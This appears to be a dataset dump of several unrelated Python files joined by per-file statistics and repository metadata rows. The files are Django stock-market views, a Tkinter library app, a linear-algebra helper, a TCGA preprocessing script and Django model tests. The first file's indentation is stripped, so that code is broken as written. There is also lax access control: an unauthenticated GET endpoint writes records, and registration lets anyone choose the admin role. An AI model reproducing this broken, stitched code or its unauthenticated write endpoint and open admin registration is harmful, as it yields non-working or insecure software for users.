class CompanyAdminCompanyUpdateView(AdminRequiredMixin, View):
""" View for admin to change company's CMP """
def get(self, request, *args, **kwargs):
company = Company.objects.get(code=kwargs.get('code'))
return render(request, 'market/admin_company_change.html', {
'object': company,
'company_list': Company.objects.all(),
'form': CompanyChangeForm()
})
def post(self, request, *args, **kwargs):
company = Company.objects.get(code=kwargs.get('code'))
price = request.POST.get('price')
old_price = company.cmp
company.cmp = Decimal(int(price))
company.save()
company.calculate_change(old_price)
print('price', int(price))
url = reverse('market:admin', kwargs={'code': company.code})
return HttpResponseRedirect(url)
class CompanyCMPCreateView(View):
def get(self, request, *args, **kwargs):
for company in Company.objects.all():
obj = CompanyCMPRecord.objects.create(company=company, cmp=company.cmp)
return HttpResponse('success')
class CompanySelectionView(LoginRequiredMixin, CountNewsMixin, View):
def get(self, request, *args, **kwargs):
return render(request, 'market/select_company.html', {
'object_list': Company.objects.all()
})
class CompanyCMPChartData(APIView):  # uses Django REST Framework
authentication_classes = []
permission_classes = []
def get(self, request, format=None, *args, **kwargs):
qs = CompanyCMPRecord.objects.filter(company__code=kwargs.get('code'))
if qs.count() > 15:
qs = qs[:15]
qs = reversed(qs) # reverse timestamp sorting i.e. latest data should be in front
labels = []
cmp_data = []
for cmp_record in qs:
labels.append(localtime(cmp_record.timestamp).strftime('%H:%M'))
cmp_data.append(cmp_record.cmp)
current_cmp = Company.objects.get(code=kwargs.get('code')).cmp
        if not cmp_data or cmp_data[-1] != current_cmp:
labels.append(timezone.make_aware(datetime.now()).strftime('%H:%M'))
cmp_data.append(current_cmp)
data = {
"labels": labels,
"cmp_data": cmp_data,
}
return Response(data)
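# Example payload shape returned by CompanyCMPChartData above (values are
# illustrative):
#   {"labels": ["10:00", "10:05"], "cmp_data": [42.5, 43.1]}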
class CompanyTransactionView(LoginRequiredMixin, CountNewsMixin, View):
def get(self, request, *args, **kwargs):
company = Company.objects.get(code=kwargs.get('code'))
obj, created = InvestmentRecord.objects.get_or_create(user=request.user, company=company)
stocks_owned = obj.stocks
return render(request, 'market/transaction_market.html', {
'object': company,
'company_list': Company.objects.all(),
'stocks_owned': stocks_owned,
'form': StockTransactionForm()
})
def post(self, request, *args, **kwargs):
company = Company.objects.get(code=kwargs.get('code'))
current_time = timezone.make_aware(datetime.now())
        if START_TIME <= current_time <= STOP_TIME:
user = request.user
mode = request.POST.get('mode')
quantity = int(request.POST.get('quantity'))
price = company.cmp
investment_obj, obj_created = InvestmentRecord.objects.get_or_create(user=user, company=company)
if quantity > 0:
if mode == 'buy':
purchase_amount = Decimal(quantity) * price
if user.cash >= purchase_amount:
if company.stocks_remaining >= quantity:
# user.buy_stocks(quantity, price)
# company.user_buy_stocks(quantity)
# investment_obj.add_stocks(quantity)
obj = Transaction.objects.create(
user=user,
company=company,
num_stocks=quantity,
price=price,
mode=mode,
user_net_worth=InvestmentRecord.objects.calculate_net_worth(user)
)
messages.success(request, 'Transaction Complete!')
else:
messages.error(request, 'The company does not have that many stocks left!')
else:
messages.error(request, 'Insufficient Balance for this transaction!')
elif mode == 'sell':
if quantity <= investment_obj.stocks and quantity <= company.stocks_offered:
# user.sell_stocks(quantity, price)
# company.user_sell_stocks(quantity)
# investment_obj.reduce_stocks(quantity)
obj = Transaction.objects.create(
user=user,
company=company,
num_stocks=quantity,
price=price,
mode=mode,
user_net_worth=InvestmentRecord.objects.calculate_net_worth(user)
)
messages.success(request, 'Transaction Complete!')
else:
messages.error(request, 'Please enter a valid quantity!')
else:
messages.error(request, 'Please enter a valid mode!')
else:
messages.error(request, 'The quantity cannot be negative!')
else:
# msg = 'The market will be live from {start} to {stop}'.format(
# start=START_TIME.strftime('%H:%M'),
# stop=STOP_TIME.strftime('%H:%M')
# )
msg = 'The market is closed!'
messages.info(request, msg)
url = reverse('market:transaction', kwargs={'code': company.code})
return HttpResponseRedirect(url)
class UserTransactionHistoryView(LoginRequiredMixin, CountNewsMixin, ListView):
template_name = 'market/user_transaction_history.html'
def get_queryset(self, *args, **kwargs):
return Transaction.objects.get_by_user(user=self.request.user)
| 40.994898
| 108
| 0.601369
| 6,314
| 0.785812
| 0
| 0
| 734
| 0.09135
| 0
| 0
| 1,288
| 0.160299
|
8be87a2381ba6a63956f68b01f8d66e526e6f9d0
| 21,478
|
py
|
Python
|
library.py
|
Kladmen228/kurs_work-c-
|
6648ca3d4f454aaa429993db80cd2fc6a3ab2bb4
|
[
"Apache-2.0"
] | 2
|
2020-07-11T21:12:42.000Z
|
2020-07-11T21:49:22.000Z
|
library.py
|
Kladmen228/kurs_work-PP
|
6648ca3d4f454aaa429993db80cd2fc6a3ab2bb4
|
[
"Apache-2.0"
] | null | null | null |
library.py
|
Kladmen228/kurs_work-PP
|
6648ca3d4f454aaa429993db80cd2fc6a3ab2bb4
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf8
import os
from tkinter import messagebox
from tkinter import ttk
from tkinter import *
import tkinter as tk
import database
from tkinter import filedialog
databaseName = 'dataBase.db'
who = 0
currentUserID = 0
currentTable = 0
root = tk.Tk()
root.title("Библиотека")
root.geometry("1750x500")
root.resizable(False, False)
var1 = IntVar()
var2 = IntVar()
var3 = IntVar()
# region tables
frame = ttk.Treeview(root)
frame.place(relx=0.15, rely=0.05, relwidth=0.33, relheight=0.89)
frame2 = ttk.Treeview(root)
frame2.place(relx=0.65, rely=0.05, relwidth=0.33, relheight=0.89)
frame["columns"] = ("ID", "Название", "Автор", "Год издания", "Кол-во")
frame.column("#0", width=0, stretch=tk.NO)
frame.column("ID", width=40, stretch=tk.NO)
frame.column("Название", width=200, stretch=tk.NO)
frame.column("Автор", width=200, stretch=tk.NO)
frame.column("Год издания", width=80, stretch=tk.NO)
frame.column("Кол-во", width=50, stretch=tk.NO)
frame.heading("ID", text="ID", anchor=tk.W)
frame.heading("Название", text="Название", anchor=tk.W)
frame.heading("Автор", text="Автор", anchor=tk.W)
frame.heading("Год издания", text="Год издания", anchor=tk.W)
frame.heading("Кол-во", text="Кол-во", anchor=tk.W)
frame2["columns"] = ("ID", "Название", "Автор", "Год издания", "Идентификатор")
frame2.column("#0", width=0, stretch=tk.NO)
frame2.column("ID", width=40, stretch=tk.NO)
frame2.column("Название", width=200, stretch=tk.NO)
frame2.column("Автор", width=150, stretch=tk.NO)
frame2.column("Год издания", width=80, stretch=tk.NO)
frame2.column("Идентификатор", width=100, stretch=tk.NO)
frame2.heading("ID", text="ID", anchor=tk.W)
frame2.heading("Название", text="Название", anchor=tk.W)
frame2.heading("Автор", text="Автор", anchor=tk.W)
frame2.heading("Год издания", text="Год издания", anchor=tk.W)
frame2.heading("Идентификатор", text="Идентификатор", anchor=tk.W)
# endregion
def connect_to_database():
try:
global databaseName
tmp = filedialog.askopenfilename(filetypes=(("DB", "*.db"), ("All files", "*.*")))
if tmp:
databaseName = tmp
database.databaseName = databaseName
fill_LibTable()
Exit()
except Exception as e:
print(e)
def fill_LibTable():
try:
if not os.path.isfile(databaseName):
answer = messagebox.askokcancel(title="INFO", message="База данных не обнаружена!\nВыберете файл базы данных")
if answer:
connect_to_database()
else:
exit(0)
frame.delete(*frame.get_children())
books = database.fill_libTable()
for i in books:
frame.insert('', 'end', values=i)
except Exception as e:
print(e)
def fill_on_hand_table():
global currentTable
try:
if currentUserID != -999:
currentTable = 0
button_take.configure(state='normal')
button_give.configure(state='normal')
frame2.heading("Идентификатор", text="Идентификатор", anchor=tk.W)
button_sortCount2.configure(text='Идентификатору')
frame2.delete(*frame2.get_children())
books = database.fill_onHandTableLib(currentUserID, who)
for i in books:
frame2.insert('', 'end', values=i)
except Exception as e:
print(e)
def fill_middle_time():
global currentTable
try:
currentTable = 1
button_take.configure(state='disabled')
button_give.configure(state='disabled')
frame2.heading("Идентификатор", text="Среднее время", anchor=tk.W)
button_sortCount2.configure(text='Времени')
frame2.delete(*frame2.get_children())
books = database.fill_middle()
for i in books:
frame2.insert('', 'end', values=i)
except Exception as e:
print(e)
def fill_frequency():
global currentTable
try:
currentTable = 2
button_take.configure(state='disabled')
button_give.configure(state='disabled')
frame2.heading("Идентификатор", text="Частота выдачи", anchor=tk.W)
button_sortCount2.configure(text='Частоте')
frame2.delete(*frame2.get_children())
books = database.fill_frequency()
for i in books:
frame2.insert('', 'end', values=i)
except Exception as e:
print(e)
def sort_frame(byWhat):
try:
frame.delete(*frame.get_children())
books = database.sort1(byWhat)
for i in books:
frame.insert('', 'end', values=i)
except Exception as e:
print(e)
def sort_frame2(byWhat):
try:
frame2.delete(*frame2.get_children())
books = database.sort2(byWhat, who, currentUserID, currentTable)
for i in books:
frame2.insert('', 'end', values=i)
except Exception as e:
print(e)
def add_book():
try:
if len(entry_id.get()) != 0 and len(entry_title.get()) != 0 and len(entry_author.get()) != 0 and \
len(entry_year.get()) != 0 and len(entry_count.get()) != 0:
data = [entry_id.get(), entry_title.get(), entry_author.get(), entry_year.get(), entry_count.get()]
if data[0].isdigit():
if not database.check_id(int(entry_id.get())):
messagebox.showerror("TypeError", "Введенный Id уже существует")
return
else:
messagebox.showerror("TypeError", "Id должен быть указан числом")
return
if not data[3].isdigit():
messagebox.showerror("TypeError", "Год издания должен быть указан числом")
return
if not data[4].isdigit():
messagebox.showerror("TypeError", "Кол-во экземпляров должно быть указано числом")
return
frame.insert('', 'end', values=data)
database.add_to_database(data)
else:
messagebox.showerror("InputError", "Все поля должны быть заполнены")
except Exception as e:
print(e)
def del_book():
try:
i = frame.selection()[0]
book = frame.item(i).values()
frame.delete(i)
book = str(book).split()
ID = book[2][1:-1]
database.del_from_database(ID)
except IndexError:
messagebox.showerror('error', 'Вы не выбрали книгу')
def replace_book(table):
try:
if table == "Library":
button_take.configure(state='normal')
button_give.configure(state='normal')
i = frame.selection()[0]
book = frame.item(i).values()
book = str(book).split()
ID = book[2][1:-1]
if database.give_book(int(ID), currentUserID) > 1:
frame.item(i, values=database.get_book(ID))
frame2.insert('', 'end', values=database.get_book_onHand(ID))
else:
frame2.insert('', 'end', values=database.get_book_onHand(ID))
frame.delete(i)
elif table == "NotInLibrary":
i = frame2.selection()[0]
book = frame2.item(i).values()
book = str(book).split()
ID = book[2][1:-1]
takeID = book[len(book) - 3][:-2]
database.take_book(ID, takeID)
database.get_middleTime(ID)
database.get_frequency(ID)
frame2.delete(i)
fill_LibTable()
else:
print('Где-то закралась ошибочка')
except IndexError:
messagebox.showerror('error', 'Вы не выбрали книгу')
def add_count(count):
try:
i = frame.selection()[0]
book = frame.item(i).values()
book = str(book).split()
ID = book[2][1:-1]
database.add_countBooks(ID, count)
fill_LibTable()
except IndexError:
messagebox.showerror('error', 'Вы не выбрали книгу')
def all_disabled():
button_middle.configure(state='disabled')
button_add.configure(state='disabled')
button_del.configure(state='disabled')
button_take.configure(state='disabled')
button_give.configure(state='disabled')
button_plusOne.configure(state='disabled')
button_plusTwo.configure(state='disabled')
button_plusFive.configure(state='disabled')
button_plusTen.configure(state='disabled')
button_plusFT.configure(state='disabled')
button_plusTwenty.configure(state='disabled')
button_sortID.configure(state='disabled')
button_sortID2.configure(state='disabled')
button_sortName.configure(state='disabled')
button_sortName2.configure(state='disabled')
button_sortAuthor.configure(state='disabled')
button_sortAuthor2.configure(state='disabled')
button_sortYear.configure(state='disabled')
button_sortYear2.configure(state='disabled')
button_sortCount.configure(state='disabled')
button_sortCount2.configure(state='disabled')
button_frequency.configure(state='disabled')
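# User type codes returned by database.check_user: "0" = regular user,
# "1" = librarian, "2" = admin; "5" signals a wrong password (see login() below).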
def login():
global who
global currentUserID
all_disabled()
if len(entry_userId.get()) != 0 and len(entry_pass.get()) != 0:
userID = database.check_user(entry_userId.get(), entry_pass.get())
if userID:
if userID == "0":
who = 0
button_take.configure(state='normal')
button_give.configure(state='normal')
elif userID == "1":
who = 1
button_middle.configure(state='normal')
button_add.configure(state='normal')
button_del.configure(state='normal')
button_take.configure(state='normal')
button_give.configure(state='normal')
button_frequency.configure(state='normal')
button_onHand.configure(state='normal')
elif userID == "2":
who = 2
button_middle.configure(state='normal')
button_add.configure(state='normal')
button_del.configure(state='normal')
button_take.configure(state='normal')
button_give.configure(state='normal')
button_plusOne.configure(state='normal')
button_plusTwo.configure(state='normal')
button_plusFive.configure(state='normal')
button_plusTen.configure(state='normal')
button_plusFT.configure(state='normal')
button_plusTwenty.configure(state='normal')
button_frequency.configure(state='normal')
button_onHand.configure(state='normal')
elif userID == "5":
messagebox.showerror('error', 'Неверный пароль')
return
else:
            messagebox.showerror('error', 'Пользователь не найден')
            return
else:
messagebox.showerror('error', 'Заполните необходимые поля')
return
var1.set(0)
var2.set(0)
var3.set(0)
if len(entry_userId.get()) != 0:
currentUserID = entry_userId.get()
fill_on_hand_table()
entry_userId.delete(0, 'end')
entry_pass.delete(0, 'end')
button_sortID.configure(state='normal')
button_sortID2.configure(state='normal')
button_sortName.configure(state='normal')
button_sortName2.configure(state='normal')
button_sortAuthor.configure(state='normal')
button_sortAuthor2.configure(state='normal')
button_sortYear.configure(state='normal')
button_sortYear2.configure(state='normal')
button_sortCount.configure(state='normal')
button_sortCount2.configure(state='normal')
button_exit.configure(state='normal')
button_enter.configure(state='disabled')
button_reg.configure(state='disabled')
def reg():
if len(entry_userId.get()) != 0 and len(entry_pass.get()) != 0:
if var1.get() == 1 and var2.get() == 0 and var3.get() == 0:
if database.reg_user(entry_userId.get(), entry_pass.get(), "0"):
messagebox.showinfo('Успех', 'Регистрация прошла успешно')
login()
else:
messagebox.showerror('error', 'Введенный логин уже существует')
elif var1.get() == 0 and var2.get() == 1 and var3.get() == 0:
if database.reg_user(entry_userId.get(), entry_pass.get(), "1"):
messagebox.showinfo('Успех', 'Регистрация прошла успешно')
login()
else:
messagebox.showerror('error', 'Введенный логин уже существует')
elif var1.get() == 0 and var2.get() == 0 and var3.get() == 1:
if database.reg_user(entry_userId.get(), entry_pass.get(), "2"):
messagebox.showinfo('Успех', 'Регистрация прошла успешно')
login()
else:
messagebox.showerror('error', 'Введенный логин уже существует')
else:
messagebox.showerror('error', 'Необходимо выбрать один из типов пользователей')
else:
messagebox.showerror('error', 'Необходимо указать логин и пароль для регистрации')
def Exit():
global who
global currentUserID
who = 0
currentUserID = -999
all_disabled()
button_enter.configure(state='normal')
button_reg.configure(state='normal')
frame2.delete(*frame2.get_children())
# region UI: building the graphical interface
l_frame = LabelFrame(root, relief=FLAT)
l_frame.place(relx=0.025, rely=0.85, relwidth=0.12, relheight=0.14)
button_add = tk.Button(root, text="Добавить", bg='#BDBDBD', command=lambda: add_book(), state='disabled')
button_add.place(relx=0.045, rely=0.40, relwidth=0.1, relheight=0.05)
button_del = tk.Button(root, text="Удалить", bg='#BDBDBD', command=lambda: del_book(), state='disabled')
button_del.place(relx=0.045, rely=0.46, relwidth=0.1, relheight=0.05)
button_give = tk.Button(root, text="->Взять книгу->", bg='#BDBDBD', command=lambda: replace_book("Library"),
state='disabled')
button_give.place(relx=0.52, rely=0.05, relwidth=0.1, relheight=0.05)
button_take = tk.Button(root, text="<-Вернуть книгу<-", bg='#BDBDBD', command=lambda: replace_book("NotInLibrary"),
state='disabled')
button_take.place(relx=0.52, rely=0.11, relwidth=0.1, relheight=0.05)
button_middle = tk.Button(root, text="Среднее время на руках", bg='#BDBDBD', command=lambda: fill_middle_time(),
state='disabled')
button_middle.place(relx=0.52, rely=0.32, relwidth=0.1, relheight=0.05)
button_frequency = tk.Button(root, text="Частота выдачи", bg='#BDBDBD', command=lambda: fill_frequency(),
state='disabled')
button_frequency.place(relx=0.52, rely=0.38, relwidth=0.1, relheight=0.05)
button_onHand = tk.Button(root, text="Список книг на руках", bg='#BDBDBD', command=lambda: fill_on_hand_table(),
state='disabled')
button_onHand.place(relx=0.52, rely=0.44, relwidth=0.1, relheight=0.05)
button_sortID = tk.Button(root, text="ID", bg='#BDBDBD', command=lambda: sort_frame("ID"), state='disabled')
button_sortID.place(relx=0.22, rely=0.945, relwidth=0.03, relheight=0.05)
button_sortName = tk.Button(root, text="Названию", bg='#BDBDBD', command=lambda: sort_frame("Name"), state='disabled')
button_sortName.place(relx=0.255, rely=0.945, relwidth=0.05, relheight=0.05)
button_sortAuthor = tk.Button(root, text="Автору", bg='#BDBDBD', command=lambda: sort_frame("Author"), state='disabled')
button_sortAuthor.place(relx=0.31, rely=0.945, relwidth=0.05, relheight=0.05)
button_sortYear = tk.Button(root, text="Году", bg='#BDBDBD', command=lambda: sort_frame("Year"), state='disabled')
button_sortYear.place(relx=0.365, rely=0.945, relwidth=0.05, relheight=0.05)
button_sortCount = tk.Button(root, text="Количеству", bg='#BDBDBD', command=lambda: sort_frame("Count"),
state='disabled')
button_sortCount.place(relx=0.42, rely=0.945, relwidth=0.05, relheight=0.05)
button_sortID2 = tk.Button(root, text="ID", bg='#BDBDBD', command=lambda: sort_frame2("ID"), state='disabled')
button_sortID2.place(relx=0.72, rely=0.945, relwidth=0.03, relheight=0.05)
button_sortName2 = tk.Button(root, text="Названию", bg='#BDBDBD', command=lambda: sort_frame2("Name"), state='disabled')
button_sortName2.place(relx=0.755, rely=0.945, relwidth=0.05, relheight=0.05)
button_sortAuthor2 = tk.Button(root, text="Автору", bg='#BDBDBD', command=lambda: sort_frame2("Author"),
state='disabled')
button_sortAuthor2.place(relx=0.81, rely=0.945, relwidth=0.05, relheight=0.05)
button_sortYear2 = tk.Button(root, text="Году", bg='#BDBDBD', command=lambda: sort_frame2("Year"), state='disabled')
button_sortYear2.place(relx=0.865, rely=0.945, relwidth=0.05, relheight=0.05)
button_sortCount2 = tk.Button(root, text="Идентификатору", bg='#BDBDBD', command=lambda: sort_frame2("takeID"),
state='disabled')
button_sortCount2.place(relx=0.92, rely=0.945, relwidth=0.06, relheight=0.05)
button_plusOne = tk.Button(root, text="+1", bg='#BDBDBD', command=lambda: add_count(1), state='disabled')
button_plusOne.place(relx=0.52, rely=0.6, relwidth=0.03, relheight=0.05)
button_plusTwo = tk.Button(root, text="+2", bg='#BDBDBD', command=lambda: add_count(2), state='disabled')
button_plusTwo.place(relx=0.555, rely=0.6, relwidth=0.03, relheight=0.05)
button_plusFive = tk.Button(root, text="+5", bg='#BDBDBD', command=lambda: add_count(5), state='disabled')
button_plusFive.place(relx=0.59, rely=0.6, relwidth=0.03, relheight=0.05)
button_plusTen = tk.Button(root, text="+10", bg='#BDBDBD', command=lambda: add_count(10), state='disabled')
button_plusTen.place(relx=0.52, rely=0.665, relwidth=0.03, relheight=0.05)
button_plusFT = tk.Button(root, text="+15", bg='#BDBDBD', command=lambda: add_count(15), state='disabled')
button_plusFT.place(relx=0.555, rely=0.665, relwidth=0.03, relheight=0.05)
button_plusTwenty = tk.Button(root, text="+20", bg='#BDBDBD', command=lambda: add_count(20), state='disabled')
button_plusTwenty.place(relx=0.59, rely=0.665, relwidth=0.03, relheight=0.05)
button_refresh = tk.Button(root, text="Обновить БД", bg='#BDBDBD', command=lambda: (Exit(), fill_LibTable(),
fill_on_hand_table()),
state='normal')
button_refresh.place(relx=0.52, rely=0.8, relwidth=0.1, relheight=0.05)
button_connect = tk.Button(root, text="Подключить БД", bg='#BDBDBD', command=lambda: connect_to_database(),
state='normal')
button_connect.place(relx=0.52, rely=0.86, relwidth=0.1, relheight=0.05)
button_enter = tk.Button(l_frame, text="Вход", bg='#BDBDBD', command=lambda: login())
button_enter.place(relx=0, rely=-0.1, relwidth=0.48, relheight=0.5)
button_reg = tk.Button(l_frame, text="Регистрация", bg='#BDBDBD', command=lambda: reg())
button_reg.place(relx=0, rely=0.46, relwidth=1, relheight=0.4)
button_exit = tk.Button(l_frame, text="Выход", bg='#BDBDBD', command=lambda: Exit(), state='disabled')
button_exit.place(relx=0.52, rely=-0.1, relwidth=0.48, relheight=0.5)
entry_id = tk.Entry(root, font=12)
entry_id.place(relx=0.045, rely=0.05, relwidth=0.1, relheight=0.05)
entry_userId = tk.Entry(root, font=12)
entry_userId.place(relx=0.025, rely=0.6, relwidth=0.1, relheight=0.05)
entry_pass = tk.Entry(root, font=12)
entry_pass.place(relx=0.025, rely=0.66, relwidth=0.1, relheight=0.05)
entry_title = tk.Entry(root, font=12)
entry_title.place(relx=0.045, rely=0.12, relwidth=0.1, relheight=0.05)
entry_author = tk.Entry(root, font=12)
entry_author.place(relx=0.045, rely=0.19, relwidth=0.1, relheight=0.05)
entry_year = tk.Entry(root, font=12)
entry_year.place(relx=0.045, rely=0.26, relwidth=0.1, relheight=0.05)
entry_count = tk.Entry(root, font=12)
entry_count.place(relx=0.045, rely=0.33, relwidth=0.1, relheight=0.05)
label_id = tk.Label(root, font=12, text="Id:", fg='black')
label_id.place(relx=0.023, rely=0.05)
label_title = tk.Label(root, font=12, text="Title:", fg='black')
label_title.place(relx=0.01, rely=0.12)
label_author = tk.Label(root, font=12, text="Author:", fg='black')
label_author.place(relx=0.005, rely=0.19)
label_year = tk.Label(root, font=12, text="Year:", fg='black')
label_year.place(relx=0.015, rely=0.26)
label_count = tk.Label(root, font=12, text="Qty:", fg='black')
label_count.place(relx=0.005, rely=0.33)
label_sort = tk.Label(root, font=12, text="Sort by:", fg='black')
label_sort.place(relx=0.148, rely=0.945)
label_sort2 = tk.Label(root, font=12, text="Sort by:", fg='black')
label_sort2.place(relx=0.647, rely=0.945)
label_fill = tk.Label(root, font=12, text="Restock", fg='black')
label_fill.place(relx=0.52, rely=0.55, relwidth=0.1, relheight=0.05)
label_func = tk.Label(root, font=12, text="Report generation", fg='black')
label_func.place(relx=0.52, rely=0.27, relwidth=0.1, relheight=0.05)
label_userType = tk.Label(root, font=12, text="User type", fg='black')
label_userType.place(relx=0.036, rely=0.55)
user = Checkbutton(root, font=12, text="User", fg='black', variable=var1)
user.place(relx=0.011, rely=0.72, relwidth=0.1, relheight=0.05)
lib_worker = Checkbutton(root, font=12, text="Librarian", fg='black', variable=var2)
lib_worker.place(relx=0.01, rely=0.76, relwidth=0.1, relheight=0.05)
admin = Checkbutton(root, font=12, text="Admin", fg='black', variable=var3)
admin.place(relx=0.0195, rely=0.8, relwidth=0.05, relheight=0.05)
fill_LibTable()
# endregion
if __name__ == "__main__":
root.mainloop()
| 44.193416
| 122
| 0.648524
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 4,608
| 0.202585
|
8be8ad1bff74a971fe98e6113f758f85c95026e6
| 621
|
py
|
Python
|
utilities.py
|
tsilifis/BayesEmbed-mfGP
|
61ee75284bac34084ee4d171257023cc4d60c910
|
[
"MIT"
] | null | null | null |
utilities.py
|
tsilifis/BayesEmbed-mfGP
|
61ee75284bac34084ee4d171257023cc4d60c910
|
[
"MIT"
] | null | null | null |
utilities.py
|
tsilifis/BayesEmbed-mfGP
|
61ee75284bac34084ee4d171257023cc4d60c910
|
[
"MIT"
] | null | null | null |
from datetime import datetime
import numpy as np
def add_basis_element(W):
    """
    Given a D x d orthonormal matrix W (with d << D), computes a new vector v that
    is orthogonal to all d columns of W and adds it as an additional column.
    Return : D x (d+1) orthonormal matrix [W v]
    """
    n_cols = W.shape[1]  # d
    n_rows = W.shape[0]  # D
    v = np.random.randn(n_rows)
    v = v / np.linalg.norm(v)
    # Gram-Schmidt: accumulate the projection of v onto the existing columns,
    # then subtract it so only the orthogonal component remains.
    u = np.zeros(v.shape)
    for i in range(n_cols):
        u = u + np.sum(W[:, i] * v) * W[:, i]
    v = (v - u).reshape(-1, 1)
    v = v / np.linalg.norm(v)
    return np.hstack([W, v])
def compact_timestamp():
return '{:%Y%m%d_%H%M%S}'.format(datetime.now())
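# Illustrative usage (not part of the original file): build a random orthonormal
# basis via QR, extend it once, and verify the result is still orthonormal.
if __name__ == '__main__':
    W0, _ = np.linalg.qr(np.random.randn(10, 3))  # 10 x 3 orthonormal columns
    W1 = add_basis_element(W0)                    # 10 x 4
    assert np.allclose(W1.T.dot(W1), np.eye(4))
    print(compact_timestamp())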
| 23
| 83
| 0.621578
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 228
| 0.36715
|
8be92b2b82e61183cec9beb6bacf4eefc2f03ab0
| 4,049
|
py
|
Python
|
data/LoadingScripts/adapt_tcga.py
|
Bertinus/causal_cell_embedding
|
417b55749130fc7b7832fd3ee4c49feff4a04593
|
[
"MIT"
] | null | null | null |
data/LoadingScripts/adapt_tcga.py
|
Bertinus/causal_cell_embedding
|
417b55749130fc7b7832fd3ee4c49feff4a04593
|
[
"MIT"
] | null | null | null |
data/LoadingScripts/adapt_tcga.py
|
Bertinus/causal_cell_embedding
|
417b55749130fc7b7832fd3ee4c49feff4a04593
|
[
"MIT"
] | null | null | null |
import numpy as np
import pandas as pd
########################################################################################################################
# Load data
########################################################################################################################
print("Adapt TCGA: Loading data. Might take some time...")
# TCGA gene expression matrix
data = pd.read_csv('Data/Downstream_Tasks/TcgaTargetGtex_rsem_gene_tpm', sep='\t')
# Load Ensembl Id conversion table
conversion_table = pd.read_csv('Data/Downstream_Tasks/ensembl_names.txt', sep='\t')
# Get list of landmark genes
gene_info = pd.read_csv("Data/L1000_PhaseI/GSE92742_Broad_LINCS/GSE92742_Broad_LINCS_gene_info.txt", sep="\t")
########################################################################################################################
# Build conversion map
########################################################################################################################
print("Adapt TCGA: build conversion map")
# Build name to ensembl dictionary
name_to_ensembl_dict = {}
for l in conversion_table.iterrows():
name_to_ensembl_dict[l[1]['Approved symbol']] = l[1]['Ensembl gene ID']
# Manually add landmark genes that are not in the ensembl ID table
not_matched_dict = {"EPRS": "ENSG00000136628",
"AARS": "ENSG00000090861",
"TOMM70A": "ENSG00000154174",
"KIAA0196": "ENSG00000164961",
"KIAA0907": "ENSG00000132680",
"PAPD7": "ENSG00000112941",
"IKBKAP": "ENSG00000070061",
"HIST2H2BE": "ENSG00000184678",
"WRB": "ENSG00000182093",
"KIAA0355": "ENSG00000166398",
"TMEM5": "ENSG00000118600",
"HDGFRP3": "ENSG00000166503",
"PRUNE": "ENSG00000143363",
"HIST1H2BK": "ENSG00000197903",
"HN1L": "ENSG00000206053",
"H2AFV": "ENSG00000105968",
"KIF1BP": "ENSG00000198954",
"KIAA1033": "ENSG00000136051",
"FAM69A": "ENSG00000154511",
"TMEM110": "ENSG00000213533",
"ATP5S": "ENSG00000125375",
"SQRDL": "ENSG00000137767",
"TMEM2": "ENSG00000135048",
"ADCK3": "ENSG00000163050",
"NARFL": "ENSG00000103245",
"FAM57A": "ENSG00000167695",
"LRRC16A": "ENSG00000079691",
"FAM63A": "ENSG00000143409",
"TSTA3": "ENSG00000104522"}
name_to_ensembl_dict = {**name_to_ensembl_dict, **not_matched_dict}
landmark_ensembl_dict = {name: name_to_ensembl_dict[name]
for name in gene_info[gene_info['pr_is_lm'] == 1]['pr_gene_symbol']}
landmark_ensembl_to_name_dict = {landmark_ensembl_dict[name]: name for name in landmark_ensembl_dict.keys()}
########################################################################################################################
# Retrieve part of TCGA matrix that corresponds to landmark genes
########################################################################################################################
print("Adapt TCGA: modify TCGA matrix")
# Remove version of the ensembl ID in TCGA data
data['ensembl'] = data['sample'].apply(lambda s: s.split('.')[0])
# Restrict to landmark genes
data_landmark_genes = data[data['ensembl'].apply(lambda s: s in landmark_ensembl_dict.values())]
data_landmark_genes = data_landmark_genes.drop(['sample'], axis=1)
# Add gene names to the matrix
data_landmark_genes['name'] = data_landmark_genes['ensembl'].apply(lambda s: landmark_ensembl_to_name_dict[s])
data_landmark_genes = data_landmark_genes.set_index('name')
data_landmark_genes = data_landmark_genes.drop(['ensembl'], axis=1)
# Save
data_landmark_genes.to_csv("Data/Downstream_Tasks/tcga_landmark_genes.csv")
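# Sanity-check sketch (illustrative, not in the original script): every landmark
# symbol should resolve to an Ensembl ID; a miss would need a manual entry in
# not_matched_dict above.
missing = [name for name in gene_info[gene_info['pr_is_lm'] == 1]['pr_gene_symbol']
           if name not in name_to_ensembl_dict]
assert not missing, "unmapped landmark genes: {}".format(missing)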
| 46.011364
| 120
| 0.514942
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,316
| 0.571993
|
8bea72f709ee92f0256045645314ed84137d7a0e
| 6,924
|
py
|
Python
|
tests/test_share_resource/test_master_data.py
|
anhlt59/django_refactor
|
1b1d86af9f732a000e30feb7644f6ca60b6e516a
|
[
"MIT"
] | null | null | null |
tests/test_share_resource/test_master_data.py
|
anhlt59/django_refactor
|
1b1d86af9f732a000e30feb7644f6ca60b6e516a
|
[
"MIT"
] | null | null | null |
tests/test_share_resource/test_master_data.py
|
anhlt59/django_refactor
|
1b1d86af9f732a000e30feb7644f6ca60b6e516a
|
[
"MIT"
] | null | null | null |
import pytest
from app.share_resources.master_data.models import *
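# NOTE: the create_* fixtures used below are assumed to be defined in a shared
# pytest conftest.py; each one creates and returns a single model instance.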
# test company_type_category
@pytest.mark.django_db
class TestCompanyTypeCategory:
def test_create(self, create_company_type_category):
assert CompanyTypeCategory.objects.count() == 1
def test_update(self, create_company_type_category):
category = create_company_type_category
category.name = "category name update"
category.save()
category_test = CompanyTypeCategory.objects.get(id=category.id)
assert category_test.name == "category name update"
def test_delete(self, create_company_type_category):
assert CompanyTypeCategory.objects.count() == 1
CompanyTypeCategory.objects.get(id=create_company_type_category.id).delete()
assert CompanyTypeCategory.objects.count() == 0
# test company_type_master
@pytest.mark.django_db
class TestCompanyTypeMaster:
def test_create(self, create_company_type_master):
assert CompanyTypeMaster.objects.count() == 1
def test_update(self, create_company_type_master):
company_type = create_company_type_master
company_type.name = "company type update"
company_type.save()
company_type_test = CompanyTypeMaster.objects.get(id=company_type.id)
assert company_type_test.name == "company type update"
def test_delete(self, create_company_type_master):
assert CompanyTypeMaster.objects.count() == 1
create_company_type_master.delete()
assert CompanyTypeMaster.objects.count() == 0
# test work_place_category
@pytest.mark.django_db
class TestWorkPlaceCategory:
def test_create(self, create_work_place_category):
assert WorkPlaceCategory.objects.count() == 1
